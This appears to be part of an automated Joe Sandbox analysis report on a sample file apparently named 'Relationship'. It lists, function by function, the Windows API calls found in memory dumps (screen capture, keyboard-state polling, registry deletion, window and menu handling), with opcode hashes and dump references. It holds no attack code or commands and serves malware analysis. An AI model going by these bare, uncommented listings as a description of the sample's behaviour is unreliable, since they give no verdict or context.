                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                            • Opcode ID: 59562e92073dad8b957076897c4013118108f5b7dfd4737e687520f4e142e927
                                                                                                                                                                                                                                                                            • Instruction ID: 103fc956c4ce5228db75d6c2d9c795fd86e98b29122f9ac4cad41253aa38c39e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59562e92073dad8b957076897c4013118108f5b7dfd4737e687520f4e142e927
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EC17B35204202AFD710DF24C4D5F6ABBE5BF84318F54C49CE56A8B2A2CB75ED46CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C73035
                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C73045
                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00C73051
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00C7305E
                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C730CA
                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C73109
                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C7312D
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C73135
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00C7313E
                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00C73145
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00C73150
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                            • Opcode ID: e2e3929b277b99adc6c8c5b94a2915db6ee766ae3dda407004b2cab9206b68b2
                                                                                                                                                                                                                                                                            • Instruction ID: 0de7e4b692f5adce5d9de1ac65386fcd039b07a48fffccd6bf3d53026b44f68c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2e3929b277b99adc6c8c5b94a2915db6ee766ae3dda407004b2cab9206b68b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19610375D00219EFCF04CFA4D884EAEBBB6FF48310F20841AE55AA7250D771AA41DF94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C8A990
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00C8A9A7
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C8A9B3
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C8A9C9
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00C8AC15
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C8AC33
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C8AC54
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00C8AC73
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C8AC95
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 00C8ACBB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 72db8d10d20f5ada6ffc3800d72e978cedec1e3366c0c200902a37ff324befec
                                                                                                                                                                                                                                                                            • Instruction ID: 86f9637c3ea184e3da2dc53ee965e9975a59c3d5fde3b8e1ae80e13ff52382a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72db8d10d20f5ada6ffc3800d72e978cedec1e3366c0c200902a37ff324befec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3B1CC70600219EFEF14DF69C984BBE3BF2BF44708F04806AEC559B295D771AA80CB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C552E6
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C55328
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C55339
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C55345
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5537A
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C553B2
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C553EB
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C55445
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C55477
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C554EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                            • Opcode ID: 64ab1e396420f2d6fa50910d85925b1ec9d3a7beb67740e17d6a8defa2b5af17
                                                                                                                                                                                                                                                                            • Instruction ID: 0e0fee53a5b36fe1669d94e263458a5b6c97c627f950c624e83f370e66c77c8f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ab1e396420f2d6fa50910d85925b1ec9d3a7beb67740e17d6a8defa2b5af17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0091F879104B06AFD704CF24C8A4BAAB7B9FF41341F404519FE9A82191EB31EED9CB95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C897B6
                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C897C6
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00C897D1
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00C89879
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C8992B
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C89948
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C89958
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C8998A
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C899CC
                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C899FD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: d6052063b6e802b613bd093a8b9ad710f9a632a4aa27d8c166226bc678201142
                                                                                                                                                                                                                                                                            • Instruction ID: e7a302b648ed56c4f639e135fe5e87fc287653fd22b815f0a0a48afe227724dd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6052063b6e802b613bd093a8b9ad710f9a632a4aa27d8c166226bc678201142
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA81C171504301AFD710EF25C884ABB7BE8FB89318F18092DF99597291DB70DA05DBA9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00CC29C0,000000FF,00000000,00000030), ref: 00C5C973
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00CC29C0,00000004,00000000,00000030), ref: 00C5C9A8
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00C5C9BA
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C5CA00
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C5CA1D
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00C5CA49
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C5CA90
                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C5CAD6
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5CAEB
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5CB0C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 4781e126a5494fd21d90e1a2c76fbe8fac7cfe055398cd55382b9ebd0aa628dc
                                                                                                                                                                                                                                                                            • Instruction ID: 795b81a467779167d111a2e9049d82139b45359a253ac5c82d7de65a9fa15d8d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4781e126a5494fd21d90e1a2c76fbe8fac7cfe055398cd55382b9ebd0aa628dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1616CB8900349AFDF11CF64D8C9AAE7FA8FB05346F040055ED22A3291D734AE99DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C5E4D4
                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5E4FA
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E504
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5E554
                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C5E570
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                            • Opcode ID: e33b9e5b5c30cba74ac6dae8da118769d443291faa42ee2ea53fc59655abb464
                                                                                                                                                                                                                                                                            • Instruction ID: 82d051af1a33e4ab7ac64014577482f2e8a453f681400fabfc059069fb4de26b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e33b9e5b5c30cba74ac6dae8da118769d443291faa42ee2ea53fc59655abb464
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 714104725402187AEB04AB649C47EFF77ACEF52751F10006AF901A61C2FF759B81B3A9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7D6C4
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C7D6ED
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7D7A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C7D70A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C7D71D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7D72F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7D765
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7D788
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7D753
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                            • Opcode ID: 470d8873124a90ffb4aa9837893e4bac8691e5341dfb7172ec3e160ac9400cca
                                                                                                                                                                                                                                                                            • Instruction ID: 73131e1b78d03346e93db829911691f1524dcb4b667711be476fd8f830f38eca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 470d8873124a90ffb4aa9837893e4bac8691e5341dfb7172ec3e160ac9400cca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10318D72A01128BBDB259B90DC88FFFBB7CEF46710F004065B81BE2184DB309E459BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C5EFCB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F215: timeGetTime.WINMM(?,?,00C5EFEB), ref: 00C0F219
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C5EFF8
                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00C5F01C
                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C5F03E
                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 00C5F05D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C5F06B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C5F08A
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00C5F095
                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 00C5F0A1
                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 00C5F0B2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                            • Opcode ID: 20534e9e3694d60367ebd337d128bbff317922c5679d5ecfd872d4e03a126260
                                                                                                                                                                                                                                                                            • Instruction ID: 455d0ec1dcb263be5ee0903c8aa17b8220977138b8334ea94fcaba27ee3438e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20534e9e3694d60367ebd337d128bbff317922c5679d5ecfd872d4e03a126260
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0321B079100244BFE7156F60EC89F6E7B69FB85716F044029F802822F2CB314D899719
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C5F374
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C5F38A
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5F39B
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C5F3AD
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5F3BE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                            • Opcode ID: acb1ab3758ec742c9aad8c6478c0b8affd45aaf8000bed137cb20160c80b6900
                                                                                                                                                                                                                                                                            • Instruction ID: c3849d265586a8a62674069fd9b20ef0127ad5035da01d58fc1b20ce1814b77c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acb1ab3758ec742c9aad8c6478c0b8affd45aaf8000bed137cb20160c80b6900
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F311E335A8011C39E724A761CC0AEFF7BBCEFD1B00F0005797D11E30E1DAA05949C5A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5A9D9
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5AA44
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C5AA64
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C5AA7B
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C5AAAA
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C5AABB
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C5AAE7
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C5AAF5
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C5AB1E
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C5AB2C
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C5AB55
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C5AB63
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
